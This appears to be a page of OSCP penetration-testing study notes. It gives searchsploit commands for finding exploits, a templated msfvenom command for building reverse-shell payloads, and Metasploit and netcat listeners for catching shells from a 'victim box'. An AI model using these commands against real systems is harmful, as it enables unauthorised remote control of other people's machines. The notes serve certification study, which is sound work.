OSCP Notes
Search…
How to hack without Metasploit

1. Finding Exploits

Search for exploits

1
searchsploit keyword1 keyword2 keyword3 ...
Copied!

Copy exploit

1
searchsploit -m [exploit database id]
Copied!
If searchsploit fails to find any juicy exploits, try Google. If Google fails, well, there’s probably not a public exploit. TRY HARDER!

2. Customising Payloads

To open a Meterpreter session or a reverse shell so that you can take control of the victim box.

MsfVenom

1
msfvenom -p [payload] -f [format] LHOST=[your ip] LPORT=[your listener port]
Copied!
    staged - windows/shell/reverse_tcp
    unstaged - “windows/shell_reverse_tcp”
Other option
    -e to choose an encoder
    -b allows you to set bad characters
List all payloads for msfvenom
1
msfvenom --list payloads
Copied!

3. Privilege Escalation

    Linux
    Windows

4. Catching reverse shells

Metasploit multi/handler listener
1
use exploit/multi/handler
2
msf exploit(multi/handler) > set payload windows/shell/reverse_tcp
3
msf exploit(multi/handler) > set lhost 192.168.1.109
4
msf exploit(multi/handler) > set lport 1234
5
msf exploit(multi/handler) > exploit
Copied!
Netcat listener (unstaged payload)
1
[email protected]:~# nc -nvlp 80
2
nc: listening on :: 80 ...
3
nc: listening on 0.0.0.0 80 ...
Copied!
Last modified 1yr ago